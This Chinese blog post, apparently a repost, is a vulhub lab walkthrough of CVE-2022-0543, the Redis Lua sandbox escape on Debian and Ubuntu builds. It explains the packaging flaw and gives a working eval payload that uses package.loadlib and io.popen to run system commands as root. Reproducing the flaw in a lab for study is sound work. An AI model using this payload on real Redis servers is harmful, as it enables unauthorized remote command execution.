【vulhub】redis CVE-2022-0543(redis沙盒逃逸)

于 2025-02-27 02:48:33 发布
阅读量37 收藏
点赞数
文章标签: redis 数据库 缓存

渗透环境

攻击机:   IP: 192.168.66.130(Kali)

漏洞收录于:vulhub/redis/CVE-2022-0543

涉及知识点:redis沙盒逃逸

漏洞详情

受影响的系统

  • 仅限于 Debian 系 Linux 发行版(如 Debian、Ubuntu)及其衍生版本。
  • 不受影响的系统:CentOS、RHEL 等非 Debian 系发行版不受此漏洞影响(漏洞源于 Debian 维护者在打包 Redis 时的补丁问题,而非 Redis 自身代码问题)。

受影响的 Redis 版本范围

  • redis版本小于等于6.x的都可以尝试。

触发条件

​ 攻击者需具备 Redis 的未授权访问权限或合法凭证。

漏洞原理

  1. 背景
    Redis 允许通过 eval 命令执行 Lua 脚本,但正常情况下这些脚本运行在沙箱中,无法执行系统命令或文件操作。

  2. 补丁引入的漏洞
    Debian/Ubuntu 在打包 Redis 时,通过补丁代码向 Lua 沙箱中注入了一个名为 package 的全局对象。该对象本应在源码中被注释(出于沙箱安全考虑),但补丁错误地重新启用了它。

  3. 沙盒逃逸过程

    • 加载动态库:攻击者可通过 package.loadlib 加载 Lua 系统库(如 liblua5.1.so.0),调用其导出函数(如 luaopen_io)获取 io 库权限。
    • 执行命令:利用 io.popen 等函数执行任意系统命令。
    local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("whoami", "r");  -- 执行系统命令
local res = f:read("*a");
f:close();
return res;

攻击思路

单从攻击角度而言,可以使用redis未授权相同的打法,博客见:【vulhub】redis 4-unacc (redis未授权访问) - Mr_Soap - 博客园

从漏洞角度来看,使用eval函数执行上面的逃逸过程即可。

复现漏洞

一、 启动漏洞容器

docker-compose up -d

img

可以看到redis运行在默认端口6379上

二、未授权连接

redis-cli -h 192.168.66.130

redis-cli -h [IP] -p [port] -a [password]

当使用默认端口6379时可不使用参数-p

测试连接,ping一下,成功连接

img

三、get shell

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local f = io.popen("whoami", "r");local res = f:read("*a");f:close();return res;' 0

img

可以看到命令都已经成功执行,我们已经拿到了root权限

原创作者: MrSoap 转载于: https://www.cnblogs.com/MrSoap/p/18738696
周德德
关注
CVE-2022-0543Redis 逃逸漏洞)
Battery的博客
11-23 11万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
MateSnake的博客
05-13 1294
Redis-未授权访问-CVE-2022-0543 (redis逃逸)
CVE-2022-0543 Redis Lua 逃逸 RCE
qq_50854662的博客
01-05 460
CVE-2022-0543 Redis Lua 逃逸 RCE
Redis逃逸漏洞(CVE-2022-0543)复现以及流量特征分析
xhscxj的博客
02-03 2171
Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。Redis 存在代码注入漏洞,攻击者可利用该漏洞远程执行代码。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
CVE-2022-0543Redis Lua绕过命令执行复现
网安君的博客
03-16 6216
0x00 漏洞简介 Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本1的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。 参考链接: https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce https://bugs.debian.org/cgi-bin/
CVE-2022-0543 Redis逃逸漏洞
weixin_45715461的博客
07-01 3677
CVE-2022-0543 Redis逃逸漏洞
Redis 逃逸漏洞复现(CVE-2022-0543
最新发布
hicode0101的博客
01-17 706
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。值得注意的是,不同环境下的liblua库路径不同,你需要指定一个正确的路径。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
没有故事
04-18 1117
我们借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。输入网址和端口,点击OK。
CVE-2022-0543(lua绕过命令执行)复现
kriesa的博客
07-13 690
CVE-2022-0543复现
cve_2022_0543-redis漏洞复现 vulfocus
c0529的博客
06-10 839
该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。自动填充了一个package变量,该变量又允许访问任意 Lua 功能。
CVE-2022-0543
sinat_25635183的博客
03-25 655
2、CVE-2022-0543Redis逃逸漏洞,Redis Labs 是一家专注于 Redis 数据库的企业公司,提供企业级的 Redis 产品和服务。出现一个新的网页,直接跳转到iana的官网(IANA(Internet Assigned Numbers Authority)是互联网分配号码局,是负责管理全球互联网协议参数的权威组织之一。根据前面的增加链接内容的操作,可以尝试一下将iana网站的链接加在靶场链接的后面。注意:每个人可能打开的网页链接不一样,需要根据自己的情况来操作后面的步骤。
CVE-2022-0543redis逃逸
huayimy的博客
02-03 982
CVE-2022-0543redis逃逸借助Lua箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
CVE-2022-0543 Redis Lua 逃逸 RCE | 附检测工具
dust_hk的博客
03-21 4695
CVE-2022-0543 Redis Lua 逃逸 RCE 摘要 Redis是一种非常广泛使用的缓存服务,但它也被用作消息代理。客户端通过套接字与 Redis 服务器通信,发送命令,服务器更改其状态(即其内存结构)以响应此类命令。Redis 嵌入了 Lua 编程语言作为其脚本引擎,可通过eval命令使用。Lua 引擎应该是化的,即客户端可以与 Lua 中的 Redis API 交互,但不能在运行 Redis 的机器上执行任意代码。Debian以及Ubuntu发行版的源在打包Redis时...
CVE-2022-0543Redis Lua 逃逸和远程代码执行
weixin_61489125的博客
04-24 610
Reginaldo Silva 发现,由于 Debian/Ubuntu 上的打包问题,能够执行任意 Lua 脚本的远程攻击者可能会逃出 Lua 箱并在主机上执行任意代码。该漏洞的存在是因为Debian/Ubuntu中的Lua库是作为动态库提供的。Redis 是一种开源(BSD 许可)内存数据结构存储,用作数据库缓存和消息代理。目前此漏洞已经修复,建议受影响用户升级更新到以下修复版本,修复链接自行官网。变量,该变量又允许访问任意 Lua 功能。复现前提本地有redis-cli。
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 1600
Redis逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
CVE-2022-0543redis逃逸)详细漏洞复现
没事我溜达
03-25 9472
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua绕过命令执行(CVE-2022-0543Redis是著名的开源Key-Value数据库,其具备在箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸箱执行任意命令。 直接写复现全过程吧
redis cve 2016 2183 修复
07-05
Redis CVE-2016-2183是一个安全漏洞,它涉及到Redis服务器的一个缓冲区溢出问题。这个漏洞发生在Redis 2.8.x和早期版本中,当处理某些特定恶意构造的命令时,可能会导致内存损坏,进而可能导致远程代码执行(RCE)。攻击者可以利用这个漏洞通过发送精心设计的命令来获取更高的权限。 该漏洞的官方修复是在Redis 2.8.22版本中发布的,后续的稳定版也包含了相应的补丁。为了修复这个问题,开发者采取了措施限制命令解析过程中对输入的长度控制,并加强了验证机制,以防止类似攻击发生。 如果你正在运行旧版本的Redis,强烈建议更新到受保护的版本,例如至少升级到2.8.22或更高,以消除这个安全隐患。同时,定期检查和应用最新的安全更新也是保持系统安全的重要步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值